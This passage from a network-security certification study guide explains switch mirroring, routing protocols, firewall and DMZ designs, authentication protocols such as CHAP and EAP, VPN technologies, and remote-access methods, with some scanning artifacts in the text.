other devices on the same switch. Configuring a Switched Port Analyzer (SPAN) 
port is one way to solve this problem, by mirroring traffic from multiple switch 
ports to one “SPAN port.” SPAN is a Cisco term; HP switches use the term “Mirror 
port.” 

One drawback to using a switch SPAN port is port bandwidth overload. A 
100-megabit, 24-port switch can mirror twenty-three 100-megabit streams of traffic 
to a 100-megabit SPAN port. The aggregate traffic could easily exceed 100 megabits, 
meaning the SPAN port (and connected NIDS) will miss traffic. 

NETWORK TAPS 

A network tap provides a way to “tap” into network traffic, and see all traffic 
(including all unicast connections) on a network. Taps are the preferred way to 
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provide promiscuous network access to a sniffer or Network Intrusion Detection 
System. 

Taps can “fail open,” so that network traffic will pass in the event of a failure. 
Taps can also provide access to all traffic, including malformed Ethernet frames. A 
switch will often “clean” that traffic and not pass it. Finally, Taps can be purchased 
with memory buffers, which cache traffic bursts. 

ROUTERS 

Routers are Layer 3 devices that route traffic from one LAN to another. IP-based 
routers make routing decisions based on the source and destination IP addresses. 


NOTE 

In the real world, one chassis, such as a Cisco 6500, can be many devices at once: a router, a switch, 
a firewall, a NIDS, etc. The exam is likely to give more clear-cut examples: a dedicated firewall, 
a dedicated switch, etc. If the exam references a multifunction device, that will be made clear. 
Regardless, it is helpful on the exam to think of these devices as distinct concepts. 


Static and Default Routes 

For simple routing needs, static routes may suffice. Static routes are fixed routing 
entries, saying “The route for network 10.0.0.0/8 routes via router 192.168.2.7; the 
route for network 172.16.0.0/12 routes via router 192.168.2.8,” etc. Most SOHO 
(Small Office/Home Office) routers have a static “default route” that sends all exter- 
nal traffic to one router (typically controlled by the ISP). 

Here is an example of a typical home LAN network configuration: 

• Internal network: 192.168.1.0/24 

• Internal Firewall IP: 1 92. 1 68 . 1 . 1 

• External Network: 192.0.2.0/30 

• External Firewall IP: 192.0.2.2 

• Next hop address: 192.0.2.1 

The firewall has an internal and external interface, with IP addresses of 
192.168.1.1 and 192.0.2.2, respectively. Internal (trusted) hosts receive addresses on 
the 192.168.1.0/24 subnet via DHCP. Internet traffic is NAT-translated to the external 
firewall IP of 192.0.2.2. The static default route for internal hosts is 192.168.1.1. The 
default external route is 192.0.2. 1 . This is a router owned and controlled by the ISP. 

Routing Protocols 

Static routes work fine for simple networks with limited or no redundancy, like 
SOHO networks. More complex networks with many routers and multiple possible 
paths between networks have more complicated routing needs. 

The network in Figure 5.23 has redundant paths between all four sites. Should 
any single circuit or site go down, at least one alternate path is available. The fastest 
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Office A Office B Office C 



FIGURE 5.23 Redundant Network Architecture 


circuits are the 45-megabit T3s that connect the data center to each office. Additional 
1.5 megabit Tls connect Office A to B, and B to C. 

Should the left-most T3 circuit go down, between the Data Center and Office A, 
there are multiple paths available from the data center to Office A: the fastest is the 
T3 to Office B, and then the T1 to Office A. 

You could use static routes for this network, preferring the faster T3s over the 
slower Tls. The problem: what happens if a T3 goes down? Network engineers like 
to say that all circuits go down. . .eventually. Static routes would require manual 
reconfiguration. 

Routing protocols are the answer. The goals of routing protocols are to auto- 
matically learn a network topology, and learn the best routes between all network 
points. Should a best route go down, backup routes should be chosen, and chosen 
quickly. And ideally this should happen, even while the network engineers are 
asleep. 

Convergence means that all routers on a network agree on the state of routing. 
A network that has had no recent outages is normally “converged”: all routers see 
all routes as available. Then a circuit goes down. The routers closest to the outage 
will know right away; routers that are further away will not. The network now 
lacks convergence: some routers believe all circuits are up, while others know 
one is down. A goal of routing protocols is to make convergence time as fast as 
possible. 
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Routing protocols come in two basic varieties: Interior Gateway Protocols 
(IGPs), like RIP and OSPF, and Exterior Gateway Protocols (EGPs), like BGP. 
Private networks like Intranets use IGPs, and EGPs are used on public networks like 
the Internet. Routing protocols support Layer 3 (Network) of the OSI model. 

Distance Vector Routing Protocols 

Metrics are used to determine the “best” route across a network. The simplest metric 
is hop count. In Figure 5.23, the hop count from the data center to each office via 
T3 is 1 . Additional paths are available from the data center to each office, such as 
the T3 to Office B, followed by the T1 to Office A. 

The latter route is two hops, and the second hop is via a slower Tl. Any network 
engineer would prefer the single-hop T3 connection from the data center to Office 
A, instead of the two-hop detour via Office B to Office A. And all routing protocols 
would do the same, choosing the one-hop T3. 

Things get trickier when you consider connections between the offices. How 
should traffic route from Office A to B? The shortest hop count is via the direct Tl. 
But that link only has 1.5 megabits: taking the two-hop route from Office A down 
to the data center and back up to Office B offers 45 megabits, at the expense of an 
extra hop. 

A distance vector routing protocol such as RIP would choose the direct Tl con- 
nection, and consider one hop at 1.5 megabits “faster” than two hops at 45 megabits. 
Most Network Engineers (and all Link state routing protocols, as described in the 
next section) would disagree. 

Distance vector routing protocols use simple metrics such as hop count, and 
are prone to routing loops, where packets loop between two routers. The following 
output is a Linux traceroute of a routing loop, starting between hops 16 and 17. The 
nyc and bos core routers will keep forwarding the packets back and forth between 
each other, each believing the other has the correct route. 


14 pwm-core-03.inet.example.com 

15 pwm-core-02.inet.example.com 

16 nyc-core-01.inet.example.com 

17 bos-core-01.inet.example.com 

18 nyc-core-01.inet.example.com 

19 bos-core-01.inet.example.com 

20 nyc-core-01.inet.example.com 

21 bos-core-01.inet.example.com 


(10.11.37.141) 165.484 ms 164.335 ms 175.928 ms 
(10.11.23.9) 162.291 ms 172.713 ms 171.532 ms 

(10.11.5.101) 212.967 ms 193.454 ms 199.457 ms 

(10.11.5.103) 206.296 ms 212.383 ms 189.592 ms 

(10.11.5.101) 210.201 ms 225.674 ms 208.124 ms 

(10.11.5.103) 189.089 ms 201.505 ms 201.659 ms 

(10.11.5.101) 334.19 ms 320.39 ms 245.182 ms 

(10.11.5.103) 218.519 ms 210.519 ms 246.635 ms 


RIP 

RIP (Routing Information Protocol) is a distance vector routing protocol that uses 
hop count as its metric. RIP will route traffic from Office A to Office B in Figure 5.23 
via the direct Tl, since it is the “closest” route at 1 hop. 

RIP does not have a full view of a network: it can only “see” directly connected 
routers. Convergence is slow. RIP sends routing updates every 30 seconds, regardless 
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of routing changes. RIP routers that are on a network that is converged for weeks will 
send routing updates every 30 seconds, around the clock. 

RIP’s maximum hop count is 15; 16 is considered “infinite.” RIPvl can 
route classful networks only; RIPv2 added support for CIDR. RIP is used by the 
UNIX routed command, and is the only routing protocol universally supported 
by UNIX. 

RIP uses split horizon to help avoid routing loops. In Figure 5.24, the circuit 
between the NYC and BOS routers has gone down. At that moment, the NYC and 
BOS routers know the circuit is down; the other routers do not. The network lacks 
convergence. 

NYC tells the PWM router “The route between NYC and BOS is down.” On PWM’s 
other interface, the ATL router may claim that the link is up. Split horizon means the 
PWM router will not “argue back”: it will not send a route update via an interface 
it learned the route from. In our case, the PWM router will not send a NYC— >BOS 
routing update to the NYC router. Poison reverse is an addition to Split Horizon: 
instead of sending nothing to NYC regarding the NYC— >BOS route, PWM sends 
NYC a NYC— >BOS route with a cost of 16 (infinite). NYC will ignore any “infinite” 
route. 

RIP uses a hold-down timer to avoid “flapping” (repeatedly changing a route’s 
status from up to down). Once RIP changes a route’s status to “down,” RIP will 
“hold” to that decision for 180 seconds. In Figure 5.24, the PWM router will keep the 
NYC— >BOS route “down” for 180 seconds. The hope is that the network will have 
reached convergence during that time. If not, after 180 seconds, RIP may change the 
status again. 
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RIP is quite limited. Each router has a partial view of the network and each sends 
updates every 30 seconds, regardless of change. Convergence is slow. Hold-down 
timers. Split Horizon, and Poison Reverse are small fixes that do not compensate for 
RIP’s weaknesses. Link State routing protocols such as OSPF are superior. 

Link State Routing Protocols 

Link state routing protocols factor in additional metrics for determining the best 
route, including bandwidth. A link state protocol would see multiple routes from 
Office A to Office B in Figure 5.23, including the direct T1 link, and the 2-hop T3 
route via the data center. The additional bandwidth (45 via 1.5 megabits) would make 
the two T3 route the winner. 

OSPF 

Open Shortest Path First (OSPF) is an open link state routing protocol. OSPF 
routers learn the entire network topology for their “area” (the portion of the 
network they maintain routes for, usually the entire network for small networks). 
OSPF routers send event-driven updates. If a network is converged for a week, 
the OSPF routers will send no updates. OSPF has far faster convergence than 
distance vector protocols such as RIP. In Figure 5.23, OSPF would choose the two 
T3 route from Office A to B, over the single-hop T1 route. 


NOTE 

The exam strongly prefers open over proprietary standards, which is why proprietary routing 
protocols like Cisco’s EIGRP are not discussed here. 


BGP 

BGP is the Border Gateway Protocol, the routing protocol used on the Internet. BGP 
routes between autonomous systems, which are networks with multiple Internet con- 
nections. BGP has some distance vector properties, but is formally considered a path 
vector routing protocol. 

FIREWALLS 

Firewalls filter traffic between networks. TCP/IP packet filter and stateful firewalls 
make decisions based on layers 3 and 4 (IP addresses and ports). Proxy firewalls can 
also make decisions based on layers 5-7. Firewalls are multi-homed: they have 
multiple NICs connected to multiple different networks. 

Packet Filter 

A packet filter is a simple and fast firewall. It has no concept of “state”: each filtering 
decision must be made on the basis of a single packet. There is no way to refer to past 
packets to make current decisions. 

The lack of state makes packet filter firewalls less secure, especially for session- 
less protocols like UDP and ICMP. In order to allow ping via a firewall, both ICMP 
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Echo Requests and Echo Replies must be allowed, independently: the firewall 
cannot match a previous request with a current reply. All Echo Replies are usually 
allowed, based on the assumption that there must have been a previous matching 
Echo Request. 

The packet filtering firewall shown in Figure 5.25 allows outbound ICMP echo 
requests and inbound ICMP echo replies. Computer 1 can ping bank.example.com. 
The problem: an attacker at evil.example.com can send unsolicited echo replies, 
which the firewall will allow. 

UDP-based protocols suffer similar problems. DNS uses UDP port 53 for small 
queries, so packet filters typically allow all UDP DNS replies on the assumption that 
there must have been a previous matching request. 

Stateful Firewalls 

Stateful firewalls have a state table that allows the firewall to compare current packets 
to previous ones. Stateful firewalls are slower than packet filters, but are far more 
secure. 

Computer 1 sends an ICMP Echo Request to bank.example.com in Figure 5.26. 
The firewall is configured to allow ping to Internet sites, so the stateful firewall allows 
the traffic, and adds an entry to it state table. 

An Echo Reply is then received from bank.example.com to Computer 1 in 
Figure 5.26. The firewall checks to see if it allows this traffic (it does), and then 
checks the state table for a matching echo request in the opposite direction. The 
firewall finds the matching entry, deletes it from the state table, and passes 
the traffic. 

Then evil.example.com sends an unsolicited ICMP Echo Reply. The stateful 
firewall, shown in Figure 5.26, sees no matching state table entry, and denies the 
traffic. 

Proxy Firewalls 

Proxies are firewalls that act as intermediary servers. Both packet filter and stateful 
firewalls pass traffic through or deny it: they are another hop along the route. The 
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TCP 3-way handshake occurs from the client to the server, and is passed along by 
packet filter or stateful firewalls. 

Proxies terminate connections. Figure 5.27 shows the difference between TCP 
Web traffic from Computer 1 to bank.example.com passing via a stateful firewall and 
a proxy firewall. The stateful firewall passes one TCP three-way handshake between 
Computer 1 and bank.example.com. A packet filter will do the same. 

The proxy firewall terminates the TCP connection from Computer 1 , and initiates 
a TCP connection with bank.example.com. In this case, there are two handshakes: 
Computer 1 — » Proxy, and Proxy — > bank.example.com. 
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Like NAT, a proxy hides the origin of a connection. In the lower half of Figure 5.27, 
the source IP address connecting to bank.example.com belongs to the firewall, not 
Computer 1. 

Application-Layer Proxy Firewalls 

Application-layer proxy firewalls operate up to Layer 7. Unlike packet filter and 
stateful firewalls that make decisions based on layers 3 and 4 only, application-layer 
proxies can make filtering decisions based on application-layer data, such as HTTP 
traffic, in addition to layers 3 and 4. 

Application-layer proxies must understand the protocol that is proxied, so dedi- 
cated proxies are often required for each protocol: an FTP proxy for FTP traffic, an 
HTTP proxy for Web traffic, etc. This allows tighter control of filtering decisions. 
Instead of relying on IP addresses and ports alone, an HTTP proxy can also make 
decisions based on HTTP data, including the content of Web data, for example. This 
allows sites to block access to explicit Web content. 

Circuit-Level Proxies Including SOCKS 

Circuit-level proxies operate at Layer 5 (session layer), and are lower down the stack 
than application-layer proxies (at Layer 7). This allows circuit-level proxies to filter 
more protocols: there is no need to understand each protocol; the application-layer 
data is simply passed along. 

The most popular example of a circuit-level proxy is SOCKS. It has no need to 
understand application-layer protocols, so it can proxy many of them. SOCKS can- 
not make fine-grained decisions like it’s application-layer cousins; it does not under- 
stand application-layer protocols such as HTTP, so it cannot make filtering decisions 
based on application layer data, such as explicit Web content. 

SOCKS uses TCP port 1080. Some applications must be “socksified” to pass 
via a SOCKS proxy. Some applications can be configured or recompiled to support 
SOCKS; others can use the “socksify” client, “socksify ftp server.example.com” is 
an example of connection to an FTP server via SOCKS using the ftp and socksify 
clients. SOCKS5 is the current version of the protocol. 

Fundamental Firewall Designs 

Firewall design has evolved over the years, from simple and flat designs such as dual- 
homed host and screened host, to layered designs such as the screened subnet. While 
these terms are no longer commonly used, and flat designs have faded from use, it is 
important to understand fundamental firewall design. This evolution has incorporat- 
ed network defense in depth, leading to the use of DMZ and more secure networks. 

Bastion Hosts 

A bastion host is any host placed on the Internet that is not protected by another 
device (such as a firewall). Bastion hosts must protect themselves, and be hardened 
to withstand attack. Bastion hosts usually provide a specific service, and all other 
services should be disabled. 
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FIGURE 5.28 Dual-Homed Host 


Dual-Homed Host 

A dual-homed host has two network interfaces: one connected to a trusted network, 
and the other connected to an untrusted network, such as the Internet. The dual- 
homed host does not route: a user wishing to access the trusted network from the 
Internet, as shown in Figure 5.28, would log into the dual-homed host first, and then 
access the trusted network from there. This design was more common before the 
advent of modern firewalls in the 1990s, and is still sometimes used to access legacy 
networks. 

Screened Host Architecture 

Screened host architecture is an older flat network design using one router to filter 
external traffic to and from a bastion host via an access control list (ACL). The 
bastion host can reach other internal resources, but the router ACL forbids direct 
internal/external connectivity, as shown in Figure 5.29. 

The difference between dual-homed host and screened host design is screened 
host uses a screening router, which filters Internet traffic to other internal systems. 
Screened host network design does not employ network defense-in-depth: a failure of 
the bastion host puts the entire trusted network at risk. Screened subnet architecture 
evolved as a result, using network defense in depth via the use of DMZ networks. 


Bastion Host lntemal Server 1 
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FIGURE 5.30 Screened Subnet Dual Firewall DMZ Design 


DMZ Networks and Screened Subnet Architecture 

A DMZ is a Demilitarized Zone network; the name is based on real-world military 
DMZ, such as the DMZ between North Korea and South Korea. A DMZ is a danger- 
ous “no-man’s land’’: this is true for both military and network DMZ. 

Any server that receives traffic from an untrusted source such as the Internet is at 
risk of being compromised. We use defense-in-depth mitigation strategies to lower this 
risk, including patching, server hardening, NIDS, etc., but some risk always remains. 

Network servers that receive traffic from untrusted networks such as the Inter- 
net should be placed on DMZ networks for this reason. A DMZ is designed with 
the assumption that any DMZ host may be compromised: the DMZ is designed to 
contain the compromise, and prevent it from extending into internal trusted networks. 
Any host on a DMZ should be hardened. Hardening should consider attacks from 
untrusted networks, as well as attacks from compromised DMZ hosts. 

A “classic” DMZ uses two firewalls, as shown in Figure 5.30. This is called 
screened subnet dual firewall design: two firewalls screen the DMZ subnet. 

A single-firewall DMZ uses one firewall, as shown in Figure 5.31. This is some- 
times called a “three-legged” DMZ. 

The single firewall design requires a firewall that can filter traffic on all interfaces: 
untrusted, trusted, and DMZ. Dual-firewall designs are more complex, but consid- 
ered more secure. In the event of compromise due to firewall failure, a dual firewall 
DMZ requires two firewall failures before the trusted network is exposed. Single 
firewall design requires one failure. 


NOTE 

The term “DMZ” alone implies a dual-firewall DMZ. 


MODEM 

A Modem is a Modulator/Demodulator. It takes binary data and modulates it into 
analog sound that can be carried on phone networks designed to carry the human 
voice. The receiving modem then demodulates the analog sound back into binary 
data. Modems are asynchronous devices: they do not operate with a clock signal. 
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DTE/DCE AND CSU/DSU 

A DTE (Data Terminal Equipment) is a network “terminal,” meaning any type of 
network-connected user machine, such as a desktop, server, or actual terminal. A 
DCE (Data Circuit-Terminating Equipment, or sometimes called Data Communica- 
tions Equipment) is a device that networks DTEs, such as a router. The most common 
use of these terms is DTE/DCE, and the meaning of each is more specific: the DCE 
marks the end of an ISP’s network. It connects to Data Terminal Equipment (DTE), 
which is the responsibility of the customer. The point where the DCE meets the DTE 
is called the demarc: the demarcation point, where the ISP’s responsibility ends, and 
the customer’s begins. 

The circuit carried via DCE/DTE is synchronous (it uses a clock signal). Both 
sides must synchronize to a clock signal, provided by the DCE. The DCE device is a 
modem or a CSU/DSU (Channel Service Unit/Data Service Unit). 


SECURE COMMUNICATIONS 

Protecting data in motion is one of the most complex challenges we face. The Inter- 
net provides cheap global communication — with little or no built-in confidentiality, 
integrity, or availability. To secure our data, we often must do it ourselves; secure 
communications describes ways to accomplish that goal. 


278 CHAPTER 5 Doma in 4: Communication and Network Security 


AUTHENTICATION PROTOCOLS AND FRAMEWORKS 

An authentication protocol authenticates an identity claim over the network. Good 
security design assumes that a network eavesdropper may sniff all packets sent 
between the client and authentication server: the protocol should remain secure. As 
we will see shortly, PAP fails this test, but CHAP and EAP pass. 

PAP & CHAP 

PAP (Password Authentication Protocol) is a very weak authentication protocol. 
It sends the username and password in cleartext. An attacker who is able to sniff 
the authentication process can launch a simple replay attack, by replaying the 
username and password, using them to log in. PAP is insecure and should not be 
used. 

CHAP (Challenge-Handshake Authentication Protocol) is a more secure authen- 
tication protocol that does not expose the cleartext password, and is not susceptible 
to replay attacks. CHAP relies on a shared secret: the password. The password is 
securely created (such as during account enrollment) and stored on the CHAP server. 
Since both the user and the CHAP server share a secret (the plaintext password), they 
can use that secret to securely communicate. 

To authenticate, the client first creates an initial (unauthenticated) connection via 
LCP (Link Control Protocol). The server then begins the three-way CHAP authenti- 
cation process: 

1 . Server sends a challenge, which is a small random string (also called a nonce). 

2. The user takes the challenge string and the password, uses a hash cipher such 
as MD5 to create a hash value, and sends that value back to the CHAP server as 
the response. 

3. The CHAP server also hashes the password and challenge, creating the expected 
response. It then compares the expected response with the response received 
from the user. 

If the responses are identical, the user must have entered the appropriate pass- 
word, and is authenticated. If they are different, the user entered the wrong password, 
and access is denied. 

The CHAP server may re-authenticate by sending a new (and different) challenge. 
The challenges must be different each time; otherwise an attacker could authenticate 
by replaying an older encrypted response. 

A drawback of CHAP is that the server stores plaintext passwords of each client. 
An attacker who compromises a CHAP server may be able to steal all the passwords 
stored on it. 

802. IX and EAP 

802. IX is “Port Based Network Access Control,” and includes EAP ( Extensible 
Authentication Protocol). EAP is an authentication framework that describes many 
specific authentication protocols. EAP is designed to provide authentication at Layer 
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2 (it is “port based,” like ports on a switch), before a node receives an IP address. It is 
available for both wired and wireless, but is more commonly deployed on WLANs. 
The major 802. IX roles are: 

• Supplicant: An 802. IX client 

• Authentication Server (AS): a server that authenticates a supplicant 

• Authenticator: a device such as an access point that allows a supplicant to 
authenticate and connect 


EXAM WARNING 


Do not confuse 802. IX (EAP) with 802.11 (Wireless). 


EAP addresses many issues, including the “roaming infected laptop” problem. 
A user with an infected laptop plugs into a typical office network and requests an IP 
address from a DHCP server. Once given an IP, the malware installed on the laptop 
begins attacking other systems on the network. 

By the time the laptop is in a position to request an IP address, it is already in a 
position to cause harm on the network, including confidentiality, integrity, and avail- 
ability attacks. This problem is most acute on WLANs (where an outside laptop 100 
feet away from a building may be able to access the network). Ideally, authentication 
should be required before the laptop can join the network: EAP does exactly this. 

Figure 5.32 shows a supplicant successfully authenticating and connecting to an 
internal network. Step 1 shows the Supplicant authenticating via EAPOL ( EAP Over 
LAN), a Layer 2 EAP implementation. Step 2 shows the Authenticator receiving the 
EAPOL traffic, and using RADIUS or Diameter to carry EAP traffic to the Authenti- 
cation Server (AS). Step 3 shows the Authenticator allowing Supplicant access to the 
internal network after successful authentication. 


Authentication 
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There are many types of EAP; we will focus on EAP-MD5, LEAP, EAP-FAST, 

EAP-TLS, EAP-TTLS, and PEAP: 

• EAP-MD5 is one of the weakest forms of EAP. It offers client — » server 
authentication only (all other forms of EAP discussed in this section support 
mutual authentication of client and server); this makes it vulnerable to man-in- 
the-middle attacks. EAP-MD5 is also vulnerable to password cracking attacks. 

• LEAP (Lightweight Extensible Authentication Protocol) is a Cisco-proprietary 
protocol released before 802. IX was finalized. LEAP has significant security 
flaws, and should not be used. 

• EAP-FAST ( EAP-Flexible Authentication via Secure Tunneling) was designed 
by Cisco to replace LEAP. It uses a Protected Access Credential (PAC), which 
acts as a pre-shared key. 

• EAP-TLS (EAP -Transport Layer Security) uses PKI, requiring both server-side 
and client-side certificates. EAP-TLS establishes a secure TLS tunnel used for 
authentication. EAP-TLS is very secure due to the use of PKI, but is complex 
and costly for the same reason. The other major versions of EAP attempt to 
create the same TLS tunnel without requiring a client-side certificate. 

• EAP-TTLS (EAP Tunneled Transport Layer Security), developed by Funk 
Software and Certicom, simplifies EAP-TLS by dropping the client-side 
certificate requirement, allowing other authentication methods (such as 
password) for client-side authentication. EAP-TTLS is thus easier to deploy 
than EAP-TLS, but less secure when omitting the client-side certificate. 

• PEAP (Protected EAP), developed by Cisco Systems, Microsoft, and RSA 
Security, is similar to (and may be considered a competitor to) EAP-TTLS, 
including not requiring client-side certificates. 

VPN 

Virtual Private Networks (VPNs) secure data sent via insecure networks such as the 

Internet. The goal is to provide the privacy provided by a circuit such as a T 1 , virtually. 

The nuts and bolts of VPNs involve secure authentication, cryptographic hashes such 

as SHA- 1 to provide integrity, and ciphers such as AES to provide confidentiality. 


NOTE 

The cryptographic details of the VPN protocols discussed here are covered in depth in Chapter 4, 
Domain 3: Security Engineering. 


SLIP and PPP 

SLIP (Serial Line Internet Protocol) is a Layer 2 protocol that provides IP connectiv- 
ity via asynchronous connections such as serial lines and modems. When SLIP was 
first introduced in 1988, it allowed routing packets via modem links for the first time 
(previously, modems were primarily used for non-routed terminal access). SLIP is a 
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bare-bones protocol that provides no built-in confidentiality, integrity, or authentica- 
tion. SLIP has largely faded from use, replaced with PPP. 

PPP (Point-to-Point Protocol) is a Layer 2 protocol that has largely replaced 
SLIP. PPP is based on HDLC (discussed previously), and adds confidentiality, 
integrity, and authentication via point-to-point links. PPP supports synchronous links 
(such as Tls) in addition to asynchronous links such as modems. 

PPTP and L2TP 

PPTP (Point-to-Point Tunneling Protocol) tunnels PPP via IP. A consortium of 
vendors, including Microsoft, 3COM, and others, developed it. PPTP uses GRE 
(Generic Routing Encapsulation) to pass PPP via IP, and uses TCP for a control 
channel (using TCP port 1723). 

L2TP (Layer 2 Tunneling Protocol) combines PPTP and L2F (Layer 2 Forward- 
ing, designed to tunnel PPP). L2TP focuses on authentication and does not provide 
confidentiality: it is frequently used with IPsec to provide encryption. Unlike PPTP, 
L2TP can also be used on non-IP networks, such as ATM. 

IPsec 

IPv4 has no built-in confidentiality; higher-layer protocols such as TLS are used to 
provide security. To address this lack of security at Layer 3, IPsec (Internet Protocol 
Security) was designed to provide confidentiality, integrity, and authentication via 
encryption for IPv6. IPsec has been ported to IPv4. IPsec is a suite of protocols; the 
major two are Encapsulating Security Protocol (ESP) and Authentication Header 
(AH). Each has an IP protocol number: ESP is protocol 50; AH is protocol 51. 


NOTE 

This chapter describes the network aspects of IPSec, SSL and TLS: see Chapter 4, Domain 3: 
Security Engineering for the cryptographic aspects of these protocols. 


IPsec Architectures 

IPsec has three architectures: host-to-gateway, gateway-to-gateway, and host-to-host. 
Host-to-gateway mode (also called client mode) is used to connect one system that 
runs IPsec client software to an IPsec gateway. Gateway-to-gateway (also called 
point-to-point) connects two IPsec gateways, which form an IPsec connection that 
acts as a shared routable network connection, like a Tl. Finally, host-to-host mode 
connects two systems (such as file servers) to each other via IPsec. Many modern 
operating systems, such as Windows 10 or Ubuntu Linux, can run IPsec natively, 
allowing them to form host-to-gateway or host-to-host connections. 

Tunnel and Transport Mode 

IPsec can be used in tunnel mode or transport mode. Tunnel mode provides confi- 
dentiality (ESP) and/or authentication (AH) to the entire original packet, including 
the original IP headers. New IP headers are added (with the source and destination 


282 CHAPTER 5 Doma in 4: Communication and Network Security 


Original Packet 


Transport Mode 


Tunnel Mode 


IP Header Data 


IP Header 


IPSec 
Header (s) 


Protected 

Data 


New IP 

IPSec 

Protected 

Protected 

Header 

Header (s) 

IP Header 

Data 


FIGURE 5.33 IPSec Tunnel and Transport Modes 


addresses of the IPsec gateways). Transport mode protects the IP data (layers 4-7) 
only, leaving the original IP headers unprotected. Both modes add extra IPsec 
headers (an AH header and/or an ESP header). Figure 5.33 shows the differences 
between tunnel and transport modes. 

SSL and TLS 

Secure Sockets Layer (SSL) was designed to protect HTTP (Hypertext Transfer Pro- 
tocol) data: HTTPS uses TCP port 443. TLS (Transport Layer Security) is the latest 
version of SSL, equivalent to SSL version 3.1. The current version of TLS is 1.2, 
described in RFC 5246 (see: http://tools.ietf.org/html/rfc5246). 

Though initially Web-focused, SSL or TLS may be used to encrypt many types 
of data, and can be used to tunnel other IP protocols to form VPN connections. SSL 
VPNs can be simpler than their IPsec equivalents: IPsec makes fundamental changes 
to IP networking, so installation of IPsec software changes the operating system 
(which requires super-user privileges). SSL client software does not require altering 
the operating system. Also, IPsec is difficult to firewall; SSL is much simpler. 

REMOTE ACCESS 

In an age of telecommuting and the mobile workforce, secure remote access is a criti- 
cal control. This includes connecting mobile users via methods such as DSL or Cable 
Modem, security mechanisms such as callback, and newer concerns such as instant 
messaging and remote meeting technology. 

ISDN 

Integrated Services Digital Network (ISDN) was an earlier attempt to provide digi- 
tal service via “copper pair,” the POTS (Plain Old Telephone Service) prevalent in 
homes and small offices around the world. This is called the “last mile”; providing 
high-speed digital service via the (historically copper pair) last mile has been a long- 
standing challenge. 

ISDN devices are called terminals. ISDN Basic Rate Interface (BRI) service provides 
two 64K digital channels (plus a 16K signaling channel) via copper pair. A PRI (Primary 
Rate Interface) provides twenty-three 64K channels, plus one 16K signaling channel. 

ISDN never found widespread home use; it was soon eclipsed by DSL and cable 
modems. ISDN is commonly used for teleconferencing and videoconferencing. 
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Table 5.9 DSL Speed and Distances [10] 


Type 

Download 

Speed 

Upload 

Speed 

Distance 
from CO 

ADSL 

1.5 to 9 Mbps 

1 6 to 640 Kbps 

18,000 feet 

SDSL 

1.544 Mbps 

1.544 Mbps 

10,000 feet 

HDSL 

1.544 Mbps 

1 .544 Mbps 

10,000 feet 

VDSL 

20-50+ Mbps 

Up to 20 Mbps 

< 5,000 feet 


DSL 

Digital Subscriber Line (DSL) has a “last mile” solution similar to ISDN: use exist- 
ing copper pairs to provide digital service to homes and small offices. DSL has found 
more widespread use due to higher speeds compared with ISDN, reaching speeds of 
10 megabits and more. 

Common types of DSL are Symmetric Digital Subscriber Line (SDSL, with 
matching upload and download speeds), Asymmetric Digital Subscriber Line 
(ADSL, featuring faster download speeds than upload), and Very High Rate Digital 
Subscriber Line (VDSL, featuring much faster asymmetric speeds). Another option 
is HDSL (High-data-rate DSL), which matches SDSL speeds using two pairs of cop- 
per; HDSL is used to provide inexpensive T1 service. 

Symmetric DSL is also called Single-Line DSL. An advantage of ADSL is that it 
allows the simultaneous use of a POTS line, often filtered from the DSL traffic. As 
a general rule, the closer a site is to the Central Office (CO), the faster the available 
service. 

Table 5.9 summarizes the speeds and modes of DSL. 

Cable Modems 

Cable modems are used by Cable TV providers to provide Internet access via broad- 
band cable TV. Cable TV access is not ubiquitous, but is available in most large towns 
and cities in industrialized areas. Broadband, unlike baseband, has multiple channels 
(like TV channels), so dedicating bandwidth for network services requires dedicating 
channels for that purpose. Cable modems provide a compelling “last mile” solution 
for the Cable TV companies: they have already invested in connecting the last mile, 
and the Internet service offers another revenue stream based on that investment. 

Unlike DSL, Cable Modem bandwidth is typically shared with neighbors on the 
same network segment. 

Callback & Caller ID 

Callback is a modem-based authentication system. When a callback account is 
created, the modem number the user will call from is entered into the account. The 
user later connects via modem and authenticates. The system hangs up, and calls 
the user back at the preconfigured number. 

Caller ID is a similar method: in addition to username and password, it requires 
calling from the correct phone number. Caller ID can be easily forged: many phone 
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providers allow the end user to select any Caller ID number of their choice. This 
makes Caller ID a weak form of authentication. 

Remote Desktop Console Access 

Many users require remote access to computers’ consoles. Naturally, some form of 
secure conduit like an IPSec VPN, SSH, or SSL tunnel should be used to ensure 
confidentiality of the connection, especially if the connection originates from out- 
side the organization. See the VPN section above for additional details on this layer 
of the remote console access. 

Remotely accessing consoles has been common practice for decades with pro- 
tocols such as the clear-text and poorly authenticated rlogin and rsh on Unix-like 
operating systems, which leverage TCP port 513 and TCP port 514, respectively. 
Two common modern protocols providing for remote access to a desktop are Virtual 
Network Computing ( VNC), which typically runs on TCP 5900 and Remote Desktop 
Protocol (RDP), which typically runs on TCP port 3389. VNC and RDP allow for 
graphical access of remote systems, as opposed to the older terminal-based approach 
to remote access. RDP is a proprietary Microsoft protocol. 

Increasingly, users are expecting easy access to a graphical desktop over the Inter- 
net that can be established quickly and from any number of personal devices. These 
expectations can prove difficult with traditional VNC and RDP based approaches, 
which, for security purposes, are frequently tunneled over an encrypted channel such 
as a VPN. 

A recent alternative to these approaches is to use a reverse tunnel, which allows 
a user who established an outbound encrypted tunnel to connect back in through the 
same tunnel. This usually requires a small agent installed on the user’s computer that 
will initiate an outbound connection using HTTPS over TCP 443. This connection 
will terminate at a central server, which the user can authenticate to (from outside the 
office) to take control of their office desktop machine. Two of the most prominent 
solutions that employ this style of approach are Citrix’ GoToMyPC and LogMeln. 

Desktop and Application Virtualization 

In addition to accessing standalone desktop systems remotely, another approach to 
providing remote access to computing resources is through desktop and application 
virtualization. Desktop virtualization is an approach that provides a centralized infra- 
structure that hosts a desktop image that can be remotely leveraged by the workforce. 
Desktop virtualization is often referred to as VDI, which, depending on the vendor in 
question, stands for either Virtual Desktop Infrastructure or Virtual Desktop Interface. 

As opposed to providing a full desktop environment, an organization can choose 
to simply virtualize key applications that will be served centrally. Like desktop 
virtualization, the centralized control associated with application virtualization 
allows the organization to employ strict access control, and perhaps more quickly 
patch the application. Additionally, application virtualization can also be used to run 
legacy applications that would otherwise be unable to run on the systems employed 
by the workforce. 
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While the terms and particulars of the approach are relatively new, the underly- 
ing concepts of both desktop and application virtualization have existed for decades 
in the form of thin clients, mainframes, and terminal servers. The main premise of 
both the refreshed and more traditional approaches is that there might be organiza- 
tional benefits to having more centralized and consolidated computing systems and 
infrastructure rather than a large number of more complex systems. In addition to 
general “economies of scale” justifications, there could be security advantages too 
from more tightly controlled desktop and application environments. Patching more 
